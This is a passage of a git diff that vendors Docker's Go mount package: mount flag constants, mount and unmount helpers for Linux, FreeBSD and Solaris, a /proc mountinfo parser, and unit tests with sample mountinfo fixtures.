STRICTATIME = syscall.MS_STRICTATIME +) diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go new file mode 100644 index 0000000000..5564f7b3cd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go @@ -0,0 +1,30 @@ +// +build !linux,!freebsd freebsd,!cgo solaris,!cgo + +package mount + +// These flags are unsupported. 
+const ( + BIND = 0 + DIRSYNC = 0 + MANDLOCK = 0 + NOATIME = 0 + NODEV = 0 + NODIRATIME = 0 + NOEXEC = 0 + NOSUID = 0 + UNBINDABLE = 0 + RUNBINDABLE = 0 + PRIVATE = 0 + RPRIVATE = 0 + SHARED = 0 + RSHARED = 0 + SLAVE = 0 + RSLAVE = 0 + RBIND = 0 + RELATIME = 0 + RELATIVE = 0 + REMOUNT = 0 + STRICTATIME = 0 + SYNCHRONOUS = 0 + RDONLY = 0 +) diff --git a/vendor/github.com/docker/docker/pkg/mount/mount.go b/vendor/github.com/docker/docker/pkg/mount/mount.go new file mode 100644 index 0000000000..66ac4bf472 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mount.go @@ -0,0 +1,74 @@ +package mount + +import ( + "time" +) + +// GetMounts retrieves a list of mounts for the current running process. +func GetMounts() ([]*Info, error) { + return parseMountTable() +} + +// Mounted determines if a specified mountpoint has been mounted. +// On Linux it looks at /proc/self/mountinfo and on Solaris at mnttab. +func Mounted(mountpoint string) (bool, error) { + entries, err := parseMountTable() + if err != nil { + return false, err + } + + // Search the table for the mountpoint + for _, e := range entries { + if e.Mountpoint == mountpoint { + return true, nil + } + } + return false, nil +} + +// Mount will mount filesystem according to the specified configuration, on the +// condition that the target path is *not* already mounted. Options must be +// specified like the mount or fstab unix commands: "opt1=val1,opt2=val2". See +// flags.go for supported option flags. +func Mount(device, target, mType, options string) error { + flag, _ := parseOptions(options) + if flag&REMOUNT != REMOUNT { + if mounted, err := Mounted(target); err != nil || mounted { + return err + } + } + return ForceMount(device, target, mType, options) +} + +// ForceMount will mount a filesystem according to the specified configuration, +// *regardless* if the target path is not already mounted. Options must be +// specified like the mount or fstab unix commands: "opt1=val1,opt2=val2". 
See +// flags.go for supported option flags. +func ForceMount(device, target, mType, options string) error { + flag, data := parseOptions(options) + if err := mount(device, target, mType, uintptr(flag), data); err != nil { + return err + } + return nil +} + +// Unmount will unmount the target filesystem, so long as it is mounted. +func Unmount(target string) error { + if mounted, err := Mounted(target); err != nil || !mounted { + return err + } + return ForceUnmount(target) +} + +// ForceUnmount will force an unmount of the target filesystem, regardless if +// it is mounted or not. +func ForceUnmount(target string) (err error) { + // Simple retry logic for unmount + for i := 0; i < 10; i++ { + if err = unmount(target, 0); err == nil { + return nil + } + time.Sleep(100 * time.Millisecond) + } + return +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go b/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go new file mode 100644 index 0000000000..253aff3b8e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go @@ -0,0 +1,162 @@ +// +build !windows,!solaris + +package mount + +import ( + "os" + "path" + "testing" +) + +func TestMountOptionsParsing(t *testing.T) { + options := "noatime,ro,size=10k" + + flag, data := parseOptions(options) + + if data != "size=10k" { + t.Fatalf("Expected size=10 got %s", data) + } + + expectedFlag := NOATIME | RDONLY + + if flag != expectedFlag { + t.Fatalf("Expected %d got %d", expectedFlag, flag) + } +} + +func TestMounted(t *testing.T) { + tmp := path.Join(os.TempDir(), "mount-tests") + if err := os.MkdirAll(tmp, 0777); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + var ( + sourceDir = path.Join(tmp, "source") + targetDir = path.Join(tmp, "target") + sourcePath = path.Join(sourceDir, "file.txt") + targetPath = path.Join(targetDir, "file.txt") + ) + + os.Mkdir(sourceDir, 0777) + os.Mkdir(targetDir, 0777) + + f, err := os.Create(sourcePath) + if err != nil { + 
t.Fatal(err) + } + f.WriteString("hello") + f.Close() + + f, err = os.Create(targetPath) + if err != nil { + t.Fatal(err) + } + f.Close() + + if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + mounted, err := Mounted(targetDir) + if err != nil { + t.Fatal(err) + } + if !mounted { + t.Fatalf("Expected %s to be mounted", targetDir) + } + if _, err := os.Stat(targetDir); err != nil { + t.Fatal(err) + } +} + +func TestMountReadonly(t *testing.T) { + tmp := path.Join(os.TempDir(), "mount-tests") + if err := os.MkdirAll(tmp, 0777); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + var ( + sourceDir = path.Join(tmp, "source") + targetDir = path.Join(tmp, "target") + sourcePath = path.Join(sourceDir, "file.txt") + targetPath = path.Join(targetDir, "file.txt") + ) + + os.Mkdir(sourceDir, 0777) + os.Mkdir(targetDir, 0777) + + f, err := os.Create(sourcePath) + if err != nil { + t.Fatal(err) + } + f.WriteString("hello") + f.Close() + + f, err = os.Create(targetPath) + if err != nil { + t.Fatal(err) + } + f.Close() + + if err := Mount(sourceDir, targetDir, "none", "bind,ro"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + f, err = os.OpenFile(targetPath, os.O_RDWR, 0777) + if err == nil { + t.Fatal("Should not be able to open a ro file as rw") + } +} + +func TestGetMounts(t *testing.T) { + mounts, err := GetMounts() + if err != nil { + t.Fatal(err) + } + + root := false + for _, entry := range mounts { + if entry.Mountpoint == "/" { + root = true + } + } + + if !root { + t.Fatal("/ should be mounted at least") + } +} + +func TestMergeTmpfsOptions(t *testing.T) { + options := []string{"noatime", "ro", "size=10k", "defaults", "atime", "defaults", "rw", "rprivate", "size=1024k", "slave"} + expected := []string{"atime", "rw", "size=1024k", "slave"} + merged, err := 
MergeTmpfsOptions(options) + if err != nil { + t.Fatal(err) + } + if len(expected) != len(merged) { + t.Fatalf("Expected %s got %s", expected, merged) + } + for index := range merged { + if merged[index] != expected[index] { + t.Fatalf("Expected %s for the %dth option, got %s", expected, index, merged) + } + } + + options = []string{"noatime", "ro", "size=10k", "atime", "rw", "rprivate", "size=1024k", "slave", "size"} + _, err = MergeTmpfsOptions(options) + if err == nil { + t.Fatal("Expected error got nil") + } +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go new file mode 100644 index 0000000000..bb870e6f59 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go @@ -0,0 +1,59 @@ +package mount + +/* +#include +#include +#include +#include +#include +#include +*/ +import "C" + +import ( + "fmt" + "strings" + "syscall" + "unsafe" +) + +func allocateIOVecs(options []string) []C.struct_iovec { + out := make([]C.struct_iovec, len(options)) + for i, option := range options { + out[i].iov_base = unsafe.Pointer(C.CString(option)) + out[i].iov_len = C.size_t(len(option) + 1) + } + return out +} + +func mount(device, target, mType string, flag uintptr, data string) error { + isNullFS := false + + xs := strings.Split(data, ",") + for _, x := range xs { + if x == "bind" { + isNullFS = true + } + } + + options := []string{"fspath", target} + if isNullFS { + options = append(options, "fstype", "nullfs", "target", device) + } else { + options = append(options, "fstype", mType, "from", device) + } + rawOptions := allocateIOVecs(options) + for _, rawOption := range rawOptions { + defer C.free(rawOption.iov_base) + } + + if errno := C.nmount(&rawOptions[0], C.uint(len(options)), C.int(flag)); errno != 0 { + reason := C.GoString(C.strerror(*C.__error())) + return fmt.Errorf("Failed to call nmount: %s", reason) + } + return nil +} + +func unmount(target string, flag 
int) error { + return syscall.Unmount(target, flag) +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go b/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go new file mode 100644 index 0000000000..dd4280c777 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go @@ -0,0 +1,21 @@ +package mount + +import ( + "syscall" +) + +func mount(device, target, mType string, flag uintptr, data string) error { + if err := syscall.Mount(device, target, mType, flag, data); err != nil { + return err + } + + // If we have a bind mount or remount, remount... + if flag&syscall.MS_BIND == syscall.MS_BIND && flag&syscall.MS_RDONLY == syscall.MS_RDONLY { + return syscall.Mount(device, target, mType, flag|syscall.MS_REMOUNT, data) + } + return nil +} + +func unmount(target string, flag int) error { + return syscall.Unmount(target, flag) +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go b/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go new file mode 100644 index 0000000000..c684aa81fc --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go @@ -0,0 +1,33 @@ +// +build solaris,cgo + +package mount + +import ( + "golang.org/x/sys/unix" + "unsafe" +) + +// #include +// #include +// #include +// int Mount(const char *spec, const char *dir, int mflag, +// char *fstype, char *dataptr, int datalen, char *optptr, int optlen) { +// return mount(spec, dir, mflag, fstype, dataptr, datalen, optptr, optlen); +// } +import "C" + +func mount(device, target, mType string, flag uintptr, data string) error { + spec := C.CString(device) + dir := C.CString(target) + fstype := C.CString(mType) + _, err := C.Mount(spec, dir, C.int(flag), fstype, nil, 0, nil, 0) + C.free(unsafe.Pointer(spec)) + C.free(unsafe.Pointer(dir)) + C.free(unsafe.Pointer(fstype)) + return err +} + +func unmount(target string, flag int) error { + err := unix.Unmount(target, flag) + return err +} diff --git 
a/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go new file mode 100644 index 0000000000..a2a3bb457f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go @@ -0,0 +1,11 @@ +// +build !linux,!freebsd,!solaris freebsd,!cgo solaris,!cgo + +package mount + +func mount(device, target, mType string, flag uintptr, data string) error { + panic("Not implemented") +} + +func unmount(target string, flag int) error { + panic("Not implemented") +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo.go new file mode 100644 index 0000000000..e3fc3535e9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo.go @@ -0,0 +1,40 @@ +package mount + +// Info reveals information about a particular mounted filesystem. This +// struct is populated from the content in the /proc//mountinfo file. +type Info struct { + // ID is a unique identifier of the mount (may be reused after umount). + ID int + + // Parent indicates the ID of the mount parent (or of self for the top of the + // mount tree). + Parent int + + // Major indicates one half of the device ID which identifies the device class. + Major int + + // Minor indicates one half of the device ID which identifies a specific + // instance of device. + Minor int + + // Root of the mount within the filesystem. + Root string + + // Mountpoint indicates the mount point relative to the process's root. + Mountpoint string + + // Opts represents mount-specific options. + Opts string + + // Optional represents optional fields. + Optional string + + // Fstype indicates the type of filesystem, such as EXT3. + Fstype string + + // Source indicates filesystem specific information or "none". + Source string + + // VfsOpts represents per super block options. 
+ VfsOpts string +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go new file mode 100644 index 0000000000..4f32edcd90 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go @@ -0,0 +1,41 @@ +package mount + +/* +#include +#include +#include +*/ +import "C" + +import ( + "fmt" + "reflect" + "unsafe" +) + +// Parse /proc/self/mountinfo because comparing Dev and ino does not work from +// bind mounts. +func parseMountTable() ([]*Info, error) { + var rawEntries *C.struct_statfs + + count := int(C.getmntinfo(&rawEntries, C.MNT_WAIT)) + if count == 0 { + return nil, fmt.Errorf("Failed to call getmntinfo") + } + + var entries []C.struct_statfs + header := (*reflect.SliceHeader)(unsafe.Pointer(&entries)) + header.Cap = count + header.Len = count + header.Data = uintptr(unsafe.Pointer(rawEntries)) + + var out []*Info + for _, entry := range entries { + var mountinfo Info + mountinfo.Mountpoint = C.GoString(&entry.f_mntonname[0]) + mountinfo.Source = C.GoString(&entry.f_mntfromname[0]) + mountinfo.Fstype = C.GoString(&entry.f_fstypename[0]) + out = append(out, &mountinfo) + } + return out, nil +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go new file mode 100644 index 0000000000..be69fee1d7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go @@ -0,0 +1,95 @@ +// +build linux + +package mount + +import ( + "bufio" + "fmt" + "io" + "os" + "strings" +) + +const ( + /* 36 35 98:0 /mnt1 /mnt2 rw,noatime master:1 - ext3 /dev/root rw,errors=continue + (1)(2)(3) (4) (5) (6) (7) (8) (9) (10) (11) + + (1) mount ID: unique identifier of the mount (may be reused after umount) + (2) parent ID: ID of parent (or of self for the top of the mount tree) + (3) major:minor: value of st_dev for files on filesystem + (4) root: root of the mount within the 
filesystem + (5) mount point: mount point relative to the process's root + (6) mount options: per mount options + (7) optional fields: zero or more fields of the form "tag[:value]" + (8) separator: marks the end of the optional fields + (9) filesystem type: name of filesystem of the form "type[.subtype]" + (10) mount source: filesystem specific information or "none" + (11) super options: per super block options*/ + mountinfoFormat = "%d %d %d:%d %s %s %s %s" +) + +// Parse /proc/self/mountinfo because comparing Dev and ino does not work from +// bind mounts +func parseMountTable() ([]*Info, error) { + f, err := os.Open("/proc/self/mountinfo") + if err != nil { + return nil, err + } + defer f.Close() + + return parseInfoFile(f) +} + +func parseInfoFile(r io.Reader) ([]*Info, error) { + var ( + s = bufio.NewScanner(r) + out = []*Info{} + ) + + for s.Scan() { + if err := s.Err(); err != nil { + return nil, err + } + + var ( + p = &Info{} + text = s.Text() + optionalFields string + ) + + if _, err := fmt.Sscanf(text, mountinfoFormat, + &p.ID, &p.Parent, &p.Major, &p.Minor, + &p.Root, &p.Mountpoint, &p.Opts, &optionalFields); err != nil { + return nil, fmt.Errorf("Scanning '%s' failed: %s", text, err) + } + // Safe as mountinfo encodes mountpoints with spaces as \040. + index := strings.Index(text, " - ") + postSeparatorFields := strings.Fields(text[index+3:]) + if len(postSeparatorFields) < 3 { + return nil, fmt.Errorf("Error found less than 3 fields post '-' in %q", text) + } + + if optionalFields != "-" { + p.Optional = optionalFields + } + + p.Fstype = postSeparatorFields[0] + p.Source = postSeparatorFields[1] + p.VfsOpts = strings.Join(postSeparatorFields[2:], " ") + out = append(out, p) + } + return out, nil +} + +// PidMountInfo collects the mounts for a specific process ID. If the process +// ID is unknown, it is better to use `GetMounts` which will inspect +// "/proc/self/mountinfo" instead. 
+func PidMountInfo(pid int) ([]*Info, error) { + f, err := os.Open(fmt.Sprintf("/proc/%d/mountinfo", pid)) + if err != nil { + return nil, err + } + defer f.Close() + + return parseInfoFile(f) +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go new file mode 100644 index 0000000000..bd100e1d49 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go @@ -0,0 +1,476 @@ +// +build linux + +package mount + +import ( + "bytes" + "testing" +) + +const ( + fedoraMountinfo = `15 35 0:3 / /proc rw,nosuid,nodev,noexec,relatime shared:5 - proc proc rw + 16 35 0:14 / /sys rw,nosuid,nodev,noexec,relatime shared:6 - sysfs sysfs rw,seclabel + 17 35 0:5 / /dev rw,nosuid shared:2 - devtmpfs devtmpfs rw,seclabel,size=8056484k,nr_inodes=2014121,mode=755 + 18 16 0:15 / /sys/kernel/security rw,nosuid,nodev,noexec,relatime shared:7 - securityfs securityfs rw + 19 16 0:13 / /sys/fs/selinux rw,relatime shared:8 - selinuxfs selinuxfs rw + 20 17 0:16 / /dev/shm rw,nosuid,nodev shared:3 - tmpfs tmpfs rw,seclabel + 21 17 0:10 / /dev/pts rw,nosuid,noexec,relatime shared:4 - devpts devpts rw,seclabel,gid=5,mode=620,ptmxmode=000 + 22 35 0:17 / /run rw,nosuid,nodev shared:21 - tmpfs tmpfs rw,seclabel,mode=755 + 23 16 0:18 / /sys/fs/cgroup rw,nosuid,nodev,noexec shared:9 - tmpfs tmpfs rw,seclabel,mode=755 + 24 23 0:19 / /sys/fs/cgroup/systemd rw,nosuid,nodev,noexec,relatime shared:10 - cgroup cgroup rw,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd + 25 16 0:20 / /sys/fs/pstore rw,nosuid,nodev,noexec,relatime shared:20 - pstore pstore rw + 26 23 0:21 / /sys/fs/cgroup/cpuset rw,nosuid,nodev,noexec,relatime shared:11 - cgroup cgroup rw,cpuset,clone_children + 27 23 0:22 / /sys/fs/cgroup/cpu,cpuacct rw,nosuid,nodev,noexec,relatime shared:12 - cgroup cgroup rw,cpuacct,cpu,clone_children + 28 23 0:23 / /sys/fs/cgroup/memory 
rw,nosuid,nodev,noexec,relatime shared:13 - cgroup cgroup rw,memory,clone_children + 29 23 0:24 / /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime shared:14 - cgroup cgroup rw,devices,clone_children + 30 23 0:25 / /sys/fs/cgroup/freezer rw,nosuid,nodev,noexec,relatime shared:15 - cgroup cgroup rw,freezer,clone_children + 31 23 0:26 / /sys/fs/cgroup/net_cls rw,nosuid,nodev,noexec,relatime shared:16 - cgroup cgroup rw,net_cls,clone_children + 32 23 0:27 / /sys/fs/cgroup/blkio rw,nosuid,nodev,noexec,relatime shared:17 - cgroup cgroup rw,blkio,clone_children + 33 23 0:28 / /sys/fs/cgroup/perf_event rw,nosuid,nodev,noexec,relatime shared:18 - cgroup cgroup rw,perf_event,clone_children + 34 23 0:29 / /sys/fs/cgroup/hugetlb rw,nosuid,nodev,noexec,relatime shared:19 - cgroup cgroup rw,hugetlb,clone_children + 35 1 253:2 / / rw,relatime shared:1 - ext4 /dev/mapper/ssd-root--f20 rw,seclabel,data=ordered + 36 15 0:30 / /proc/sys/fs/binfmt_misc rw,relatime shared:22 - autofs systemd-1 rw,fd=38,pgrp=1,timeout=300,minproto=5,maxproto=5,direct + 37 17 0:12 / /dev/mqueue rw,relatime shared:23 - mqueue mqueue rw,seclabel + 38 35 0:31 / /tmp rw shared:24 - tmpfs tmpfs rw,seclabel + 39 17 0:32 / /dev/hugepages rw,relatime shared:25 - hugetlbfs hugetlbfs rw,seclabel + 40 16 0:7 / /sys/kernel/debug rw,relatime shared:26 - debugfs debugfs rw + 41 16 0:33 / /sys/kernel/config rw,relatime shared:27 - configfs configfs rw + 42 35 0:34 / /var/lib/nfs/rpc_pipefs rw,relatime shared:28 - rpc_pipefs sunrpc rw + 43 15 0:35 / /proc/fs/nfsd rw,relatime shared:29 - nfsd sunrpc rw + 45 35 8:17 / /boot rw,relatime shared:30 - ext4 /dev/sdb1 rw,seclabel,data=ordered + 46 35 253:4 / /home rw,relatime shared:31 - ext4 /dev/mapper/ssd-home rw,seclabel,data=ordered + 47 35 253:5 / /var/lib/libvirt/images rw,noatime,nodiratime shared:32 - ext4 /dev/mapper/ssd-virt rw,seclabel,discard,data=ordered + 48 35 253:12 / /mnt/old rw,relatime shared:33 - ext4 /dev/mapper/HelpDeskRHEL6-FedoraRoot 
rw,seclabel,data=ordered + 121 22 0:36 / /run/user/1000/gvfs rw,nosuid,nodev,relatime shared:104 - fuse.gvfsd-fuse gvfsd-fuse rw,user_id=1000,group_id=1000 + 124 16 0:37 / /sys/fs/fuse/connections rw,relatime shared:107 - fusectl fusectl rw + 165 38 253:3 / /tmp/mnt rw,relatime shared:147 - ext4 /dev/mapper/ssd-root rw,seclabel,data=ordered + 167 35 253:15 / /var/lib/docker/devicemapper/mnt/aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,relatime shared:149 - ext4 /dev/mapper/docker-253:2-425882-aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,seclabel,discard,stripe=16,data=ordered + 171 35 253:16 / /var/lib/docker/devicemapper/mnt/c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,relatime shared:153 - ext4 /dev/mapper/docker-253:2-425882-c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,seclabel,discard,stripe=16,data=ordered + 175 35 253:17 / /var/lib/docker/devicemapper/mnt/1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,relatime shared:157 - ext4 /dev/mapper/docker-253:2-425882-1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,seclabel,discard,stripe=16,data=ordered + 179 35 253:18 / /var/lib/docker/devicemapper/mnt/d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,relatime shared:161 - ext4 /dev/mapper/docker-253:2-425882-d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,seclabel,discard,stripe=16,data=ordered + 183 35 253:19 / /var/lib/docker/devicemapper/mnt/6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,relatime shared:165 - ext4 /dev/mapper/docker-253:2-425882-6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,seclabel,discard,stripe=16,data=ordered + 187 35 253:20 / /var/lib/docker/devicemapper/mnt/8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,relatime shared:169 - ext4 
/dev/mapper/docker-253:2-425882-8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,seclabel,discard,stripe=16,data=ordered + 191 35 253:21 / /var/lib/docker/devicemapper/mnt/c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,relatime shared:173 - ext4 /dev/mapper/docker-253:2-425882-c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,seclabel,discard,stripe=16,data=ordered + 195 35 253:22 / /var/lib/docker/devicemapper/mnt/2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,relatime shared:177 - ext4 /dev/mapper/docker-253:2-425882-2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,seclabel,discard,stripe=16,data=ordered + 199 35 253:23 / /var/lib/docker/devicemapper/mnt/37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,relatime shared:181 - ext4 /dev/mapper/docker-253:2-425882-37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,seclabel,discard,stripe=16,data=ordered + 203 35 253:24 / /var/lib/docker/devicemapper/mnt/aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,relatime shared:185 - ext4 /dev/mapper/docker-253:2-425882-aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,seclabel,discard,stripe=16,data=ordered + 207 35 253:25 / /var/lib/docker/devicemapper/mnt/928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,relatime shared:189 - ext4 /dev/mapper/docker-253:2-425882-928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,seclabel,discard,stripe=16,data=ordered + 211 35 253:26 / /var/lib/docker/devicemapper/mnt/0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,relatime shared:193 - ext4 /dev/mapper/docker-253:2-425882-0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,seclabel,discard,stripe=16,data=ordered + 215 35 253:27 / /var/lib/docker/devicemapper/mnt/d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,relatime shared:197 - 
ext4 /dev/mapper/docker-253:2-425882-d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,seclabel,discard,stripe=16,data=ordered + 219 35 253:28 / /var/lib/docker/devicemapper/mnt/bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,relatime shared:201 - ext4 /dev/mapper/docker-253:2-425882-bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,seclabel,discard,stripe=16,data=ordered + 223 35 253:29 / /var/lib/docker/devicemapper/mnt/7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,relatime shared:205 - ext4 /dev/mapper/docker-253:2-425882-7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,seclabel,discard,stripe=16,data=ordered + 227 35 253:30 / /var/lib/docker/devicemapper/mnt/c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,relatime shared:209 - ext4 /dev/mapper/docker-253:2-425882-c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,seclabel,discard,stripe=16,data=ordered + 231 35 253:31 / /var/lib/docker/devicemapper/mnt/8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,relatime shared:213 - ext4 /dev/mapper/docker-253:2-425882-8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,seclabel,discard,stripe=16,data=ordered + 235 35 253:32 / /var/lib/docker/devicemapper/mnt/1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,relatime shared:217 - ext4 /dev/mapper/docker-253:2-425882-1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,seclabel,discard,stripe=16,data=ordered + 239 35 253:33 / /var/lib/docker/devicemapper/mnt/e9aa60c60128cad1 rw,relatime shared:221 - ext4 /dev/mapper/docker-253:2-425882-e9aa60c60128cad1 rw,seclabel,discard,stripe=16,data=ordered + 243 35 253:34 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,relatime shared:225 - ext4 
/dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,seclabel,discard,stripe=16,data=ordered + 247 35 253:35 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,relatime shared:229 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,seclabel,discard,stripe=16,data=ordered + 31 21 0:23 / /DATA/foo_bla_bla rw,relatime - cifs //foo/BLA\040BLA\040BLA/ rw,sec=ntlm,cache=loose,unc=\\foo\BLA BLA BLA,username=my_login,domain=mydomain.com,uid=12345678,forceuid,gid=12345678,forcegid,addr=10.1.30.10,file_mode=0755,dir_mode=0755,nounix,rsize=61440,wsize=65536,actimeo=1` + + ubuntuMountInfo = `15 20 0:14 / /sys rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw +16 20 0:3 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw +17 20 0:5 / /dev rw,relatime - devtmpfs udev rw,size=1015140k,nr_inodes=253785,mode=755 +18 17 0:11 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=000 +19 20 0:15 / /run rw,nosuid,noexec,relatime - tmpfs tmpfs rw,size=205044k,mode=755 +20 1 253:0 / / rw,relatime - ext4 /dev/disk/by-label/DOROOT rw,errors=remount-ro,data=ordered +21 15 0:16 / /sys/fs/cgroup rw,relatime - tmpfs none rw,size=4k,mode=755 +22 15 0:17 / /sys/fs/fuse/connections rw,relatime - fusectl none rw +23 15 0:6 / /sys/kernel/debug rw,relatime - debugfs none rw +24 15 0:10 / /sys/kernel/security rw,relatime - securityfs none rw +25 19 0:18 / /run/lock rw,nosuid,nodev,noexec,relatime - tmpfs none rw,size=5120k +26 21 0:19 / /sys/fs/cgroup/cpuset rw,relatime - cgroup cgroup rw,cpuset,clone_children +27 19 0:20 / /run/shm rw,nosuid,nodev,relatime - tmpfs none rw +28 21 0:21 / /sys/fs/cgroup/cpu rw,relatime - cgroup cgroup rw,cpu +29 19 0:22 / /run/user rw,nosuid,nodev,noexec,relatime - tmpfs none rw,size=102400k,mode=755 +30 15 0:23 / /sys/fs/pstore rw,relatime - pstore none rw +31 21 0:24 / 
/sys/fs/cgroup/cpuacct rw,relatime - cgroup cgroup rw,cpuacct +32 21 0:25 / /sys/fs/cgroup/memory rw,relatime - cgroup cgroup rw,memory +33 21 0:26 / /sys/fs/cgroup/devices rw,relatime - cgroup cgroup rw,devices +34 21 0:27 / /sys/fs/cgroup/freezer rw,relatime - cgroup cgroup rw,freezer +35 21 0:28 / /sys/fs/cgroup/blkio rw,relatime - cgroup cgroup rw,blkio +36 21 0:29 / /sys/fs/cgroup/perf_event rw,relatime - cgroup cgroup rw,perf_event +37 21 0:30 / /sys/fs/cgroup/hugetlb rw,relatime - cgroup cgroup rw,hugetlb +38 21 0:31 / /sys/fs/cgroup/systemd rw,nosuid,nodev,noexec,relatime - cgroup systemd rw,name=systemd +39 20 0:32 / /var/lib/docker/aufs/mnt/b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc rw,relatime - aufs none rw,si=caafa54fdc06525 +40 20 0:33 / /var/lib/docker/aufs/mnt/2eed44ac7ce7c75af04f088ed6cb4ce9d164801e91d78c6db65d7ef6d572bba8-init rw,relatime - aufs none rw,si=caafa54f882b525 +41 20 0:34 / /var/lib/docker/aufs/mnt/2eed44ac7ce7c75af04f088ed6cb4ce9d164801e91d78c6db65d7ef6d572bba8 rw,relatime - aufs none rw,si=caafa54f8829525 +42 20 0:35 / 